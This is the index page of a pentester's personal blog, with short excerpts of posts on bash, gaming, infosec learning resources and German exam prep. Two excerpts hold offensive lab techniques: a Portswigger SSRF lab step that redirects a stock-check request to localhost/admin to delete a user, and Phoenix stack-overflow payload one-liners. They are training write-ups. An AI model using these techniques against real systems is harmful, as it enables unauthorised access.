bunthut
Automate the boring stuff with bash
I really start to love bash. And dislike python. I’m not good at both, but i like to automate boring, repeative tasks. Being a pentester and network admin using linux (of course) i’m working a lot in the shell, editing connfig files, checking network devices and such things. I encounter a lot of problems which … Read moreAutomate the boring stuff with bash
UO is free to play
When I was 13 years old I was discovering multiplayer games. That was in the end of the 90s and Internet was still very expensive and paid by the minute usually. You gotta dial up your 56k modem and occupy your families phone line. That made internet cafe’s popular and by the time a new … Read moreUO is free to play
Ransomeware in 1992
The german “Die Drei Fragezeichen” (The three ???, a fictional detective trio from german audio drama for kids, which is popular among adults nowadays) investigated in a floppy disc driven malware attack in the episode 056/Angriff der Computer-Viren (Attack of the computer viruses). Funnily the whole threat model reminds heavily of todays ransomewares. The three … Read moreRansomeware in 1992
Wanna learn? tryhackme.com.
I recently discovered tryhackme.com and I am so stunned by the awesome material. You won’t need any other site to learn pentesting anymore and it’s mostly free. It’s FULL of vulnerably boxes you scan spin up in the cloud privately with and without walkthroughs. Pure awesomeness…
Learning SSRF with Portswigger Labs
Basic SSRF against the local Server https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost When accessing a product page an check stock link checks the stock through an API on some URL. We just need to change the url to localhost/admin where we can see user delete links and here we go with the request to delete that carlos: POST /product/stock HTTP/1.1 … Read moreLearning SSRF with Portswigger Labs
The Big and Dandy "How to get into Infosec" Resources Post 2020
On a daily basis and on all hacking oriented communities, people ask how to start or to get into Infosec. I decided to maintain a post where I collect my ressources regarding (beginner) learning ressources. I am learning towards an infosec position for a while now and I am now a junior pentester at a … Read moreThe Big and Dandy "How to get into Infosec" Resources Post 2020
FiSi Prüfungsvorbereitung
Ich habe mir vorgenommen, meine Prüfungsvorbereitung online zu sammeln, ich denke, ich behandele immer kleine Themen als Post. As usual, sind die Informationen Unvollständig und nur auf meine Bedürfnisse abgestimmt. Aber vll kann es einer gebrauchen. Trying to be IHK compliant. Ressourcen Projektmanagement https://www.inloox.de/unternehmen/blog/artikel/einfuehrung-ins-pm-10-was-ist-ein-netzplan/ Wirtschaft https://www.bpb.de/nachschlagen/lexika/lexikon-der-wirtschaft/20309/preisbildung https://www.unternehmerlexikon.de/preisbildung/
WriteUp: Phoenix Exploit.Education
Writeup for the Phoenix VM from http://exploit.education/phoenix/. stack-onepython -c ‘print 64*”A”‘ stack-twoexport ExploitEducation=$”cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc\n\t\n\r” learned about endianess here. really missing some of the basic computer science stuff, but well coming to it… stack-threeuser@phoenix-amd64:/opt/phoenix/amd64$ objdump stack-three -x | grep level user@phoenix-amd64:/opt/phoenix/amd64$ python -c ‘print “c”*64+”\x9d\x06@”‘ | ./stack-three Welcome to phoenix/stack-three, brought to you by https://exploit.education calling function … Read moreWriteUp: Phoenix Exploit.Education
Netflix: No more support for Firefox 60.8.0esr
Update (way later): Firefox was updated to 68something in Debian on the next day. <3 debian